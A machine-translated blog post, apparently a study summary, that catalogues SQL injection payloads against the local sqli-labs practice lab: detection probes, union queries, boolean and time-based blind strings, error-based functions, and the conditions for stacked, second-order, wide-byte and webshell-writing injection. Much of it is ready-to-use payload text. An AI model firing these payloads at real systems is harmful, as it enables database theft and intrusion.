当前位置:网站首页>[network security] SQL injection syntax summary
[network security] SQL injection syntax summary
2022-07-07 14:04:00 【Penguin jumping stairs】
Catalog
Two 、SQL Injection judgment method
3. Search detection and xx Type detection
1.order by Judging the number of columns
(2) Query the current database name
(3) Query the number of tables under the database
(4) Query the first table name in the database
(5) Query the number of fields in the following table of the database
(6) Judge the length of the first field in the following table of the database
(7) Query the first digit of the first field in the following table of the database
(8) Get the first data of field detection
(1) Determine whether there is a delay function
(2) Query the length of the current database , If correct, then delay 5 second
(3) Judge whether the first digit of the current database name is a
(4) Determine the first place of the current database name ascii Is it 100
(7) Intercept the first place of the table name
(8) Query the number of column fields
(10) Take the first place in the column
(11) Inquire about id Length of the first data
(12) Get the content of data information
5、 ... and 、 An error injection
7、 ... and 、 The secondary injection
8、 ... and 、 Wide byte Injection
Ten 、 Request header Injection
11、 ... and 、SQL Injection write webshell
One 、 principle
So-called SQL Inject , It's through SQL Command insert into Web Submit the form or enter the domain name Or the query string requested by the page , Finally, to cheat the server to execute malicious SQL command
SQL Syntax allows database commands to be mixed with user data . If Developers are not careful Words , User data may be interpreted as commands , In this case , Remote users will not only be able to Web Apply input data , And you can execute any command on the database .
Two 、SQL Injection judgment method
1. Character type detection
Character type judgment url Whether there is injection , stay url Add a Single quotation marks
url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1’
Such an error will be displayed , It roughly means that you have a sql Grammar mistakes , When adding %23 An annotation character will be displayed normally .
When we're in url Enter after the single quotation mark of the column URL and 1=1 Time page According to the normal .
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=1#
When we put 1=1 Switch to 1=2 when Page error reporting
http://127.0.0.1/sqli-labs-master/Less-1/?id=1' and 1=2#
2. Digital detection
Direct input and 1=1 see .
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=1
It's possible to Display the page normally Of , Then we are making a further judgment 1=2 when .
http://127.0.0.1/sqli-labs-master/Less-2/?id=1 and 1=2
Found that the page has changed , Then we can judge that it is a digital injection , Because digital injection does not need quotation marks . Just Be similar to int equally .
3. Search detection and xx Type detection
This is a kind of character type detection , It just needs to be carried out according to different error information The structure is closed .
3、 ... and 、union Inject
1.order by And error reporting injection
select * from users order by id and(updatexml(1,concat(0x7e,(select count(*) from information_schema.schemata)),0));
2.union The joint query
?id=111’ union select 1,2,(group_concat(table_name) from information_schema.tables where table_schema=‘ Database name ’) --+
Four 、 Blind note
1. Bull's blind note
(1) Query database length
and (length(database()))>8%23
(2) Query the current database name
and (ascii(substr(database(),1,1)))<120 %23
(3) Query the number of tables under the database
and (select count(*) from information_schema.tables where table_schema=' Database name ')>4 %23
(4) Query the first table name in the database
and (length((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1)))=6%23
(5) Query the number of fields in the following table of the database
and (ascii(substr((select table_name from information_schema.tables where table_schema=' Database name ' limit 0,1),1,1))>100)%23
(6) Judge the length of the first field in the following table of the database
and (length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1)))=2%23
(7) Query the first digit of the first field in the following table of the database
and (ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105 %23
(8) Get the first data of field detection
and (ascii(substr((select Field name from Table name limit 0,1),1,1)))=68 %23
2. Time blind note
(1) Determine whether there is a delay function
and sleep(5) %23
(2) Query the length of the current database , If correct, then delay 5 second
and if((length(database()))>7,sleep(5),1) --+
(3) Judge whether the first digit of the current database name is a
and if((substr(database(),1,1)='a'),sleep(5),1) %23
(4) Determine the first place of the current database name ascii Is it 100
and if((ascii(substr(database(),1,1))=100),sleep(5),1) %23
(5) Number of query tables
and if((select count(*) from information_schema.tables where table_schema=' Database name ')=4,sleep(5),1)%23
(6) Query table name length
and if((select length((select table_name from information_schema.tables where table_schema=' Database name ' limit 3,1))=5),sleep(5),1)%23
(7) Intercept the first place of the table name
and if((select ascii(substr((select table_name from information_schema.tables where table_schema=' Database name limit 3,1),1,1)))=117,sleep(5),1)%23
(8) Query the number of column fields
and if(((select count(*) from information_schema.columns where table_schema=' Database name ' and table_name='users')=3),sleep(5),1)%23
(9) Query column name length
and if((select length((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1))=2),sleep(5),1)%23
(10) Take the first place in the column
and if((select ascii(substr((select column_name from information_schema.columns where table_schema=' Database name ' and table_name=' Table name ' limit 0,1),1,1)))=105,sleep(5),1)%23
(11) Inquire about id Length of the first data
and if((select length((select id from Table name limit 0,1)))=1,sleep(5),1)%23
(12) Get the content of data information
and if((select ascii(substr((select id from Table name limit 0,1),1,1)))=49,sleep(5),1)%23
5、 ... and 、 An error injection
(1)floor()
and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a) %23
(2)extractvalue()
select * from Database name where id=1 and (extractvalue(1,concat(0x7e,(select Table name ()),0x7e)));
(3)updatexml()
select * from Database name where id=1 and (updatexml(1,concat(0x7e,(select Table name ()),0x7e),1));
(4)geometrycollection()
select * from Database name where id=1 and geometrycollection((select * from(select * from(select Table name ())a)b));
(5)multipoint()
select * from Database name where id=1 and multipoint((select * from(select * from(select Table name ())a)b));
(6)polygon()
select * from Database name where id=1 and polygon((select * from(select * from(select Table name ())a)b));
(7)multipolygon()
select * from Database name where id=1 and multipolygon((select * from(select * from(select Table name ())a)b));
(8)linestring()
select * from Database name where id=1 and linestring((select * from(select * from(select Table name ())a)b));
(9)multilinestring()
select * from Database name where id=1 and multilinestring((select * from(select * from(select Table name ())a)b));
(10)exp()
select * Database name test where id=1 and exp(~(select * from(select Table name ())a));
6、 ... and 、 Stack Injection
principle : The principle of Stack Injection : mysql_multi_query() Support multiple sql Statements execute simultaneously , That's it. ; Separate , Piles of execution sql sentence
for example
select * from users;show databases;
Just execute the above two commands at the same time , So we can add, delete, modify and check , As long as the authority is enough
Although this injection posture is very awesome , But in reality, there are few , It may be affected by API Or database engine , Or the restriction of permission can only be implemented when calling database functions sql Statement , utilize mysqli_multi_query() Function supports multiple sql Statements execute simultaneously , But in reality , Such as PHP In order to prevent sql Injection mechanism , The functions that are often used to call the database are mysqli_ query() function , It can only execute one statement , What follows the semicolon will not be executed , Therefore, it can be said that the use conditions of stack injection are very limited , Once it can be used , It may pose a great threat to the website .
7、 ... and 、 The secondary injection
The secondary injection , It can be summarized as the following two steps :
(1) Insert malicious data
When inserting data into the database , About the Special characters are escaped , stay Write to database At the same time, the original data is retained .
(2) Quoting malicious data
By default, the data stored in the database is safe , When making a query , Directly from the database Extract malicious data , Treatment without further inspection .
8、 ... and 、 Wide byte Injection
(1) principle
When passing a parameter id=1‘ It's time , When we enter this single quotation mark , Would be considered to be Illegal characters , Will be Filter function add “\” Filter out , So we want the program to accept that the parameters we pass contain single quotes , Then you need to put this escape character “\” kill , Then how can we kill it ? When http When the protocol is transmitted , Is to go through url Coded , If this coding is complete , When delivered to the server , We can precede single quotation marks Add a %81 This has to be coded , Finally, when decoding like this , This %81 And “/” The corresponding codes are combined according to gbk Coding requires decoding , All that's left is a single quote .
(2) Conditions
Ⅰ: The database query is set to GBK code
Ⅱ: Used addslashes(),mysql_real_escape_string(),mysql_escape_string() Functions like that
Nine 、dnslog Inject
(1) Conditions
mysql.ini in secure_file_priv Must be empty
●secure_file_priv by null Import and export are not allowed
●secure_file_priv by /tmp Import and export can only be done in /tmp Under the table of contents
●secure_file_priv It's empty time Import and export are allowed without restrictions
Ten 、SQL Injection write webshell
(1) Conditions
Ⅰ: At present sql The injection user must be DBA jurisdiction (--is-dba by true)
Ⅱ: Need to know the website Absolute path
Ⅲ:My.ini This configuration in the file secure_file_priv=”” It's empty
11、 ... and 、 summary
Summed up a long time of information , I hope all technical friends can finish reading .
边栏推荐
- Leecode3. Longest substring without repeated characters
- Use of polarscatter function in MATLAB
- Interface automation test - solution of data dependency between interfaces
- 供应链供需预估-[时间序列]
- FCOS3D label assignment
- [daily training -- Tencent select 50] 231 Power of 2
- MySQL error 28 and solution
- Is the spare money in your hand better to fry stocks or buy financial products?
- Help tenants
- 【AI实战】应用xgboost.XGBRegressor搭建空气质量预测模型(二)
猜你喜欢
Leetcode simple question sharing (20)
Mathématiques avancées - - chapitre 8 différenciation des fonctions multivariables 1
得物客服热线的演进之路
"Song of ice and fire" in the eleventh issue of "open source Roundtable" -- how to balance the natural contradiction between open source and security?
【堡垒机】云堡垒机和普通堡垒机的区别是什么?
Wired network IP address of VMware shared host
Redis can only cache? Too out!
2022-7-6 Leetcode27.移除元素——太久没有做题了,为双指针如此狼狈的一天
How to check the ram and ROM usage of MCU through Keil
2022-7-6 sigurg is used to receive external data. I don't know why it can't be printed out
随机推荐
高等数学---第八章多元函数微分学1
室內ROS機器人導航調試記錄(膨脹半徑的選取經驗)
请问,PTS对数据库压测有好方案么?
Laravel5 call to undefined function OpenSSL cipher IV length() error php7 failed to open OpenSSL extension
最佳实践 | 用腾讯云AI意愿核身为电话合规保驾护航
648. Word replacement: the classic application of dictionary tree
搜索框效果的实现【每日一题】
华为镜像地址
XML文件的解析操作
参数关键字Final,Flags,Internal,映射关键字Internal
TPG x AIDU | AI leading talent recruitment plan in progress!
3D Detection: 3D Box和点云 快速可视化
requires php ~7.1 -&gt; your PHP version (7.0.18) does not satisfy that requirement
mysql导入文件出现Data truncated for column ‘xxx’ at row 1的原因
AI talent cultivation new ideas, this live broadcast has what you care about
Data refresh of recyclerview
Excellent open source system recommendation of ThinkPHP framework
实现IP地址归属地显示功能、号码归属地查询
【日常训练】648. 单词替换
What are the principles for distinguishing the security objectives and implementation methods that cloud computing security expansion requires to focus on?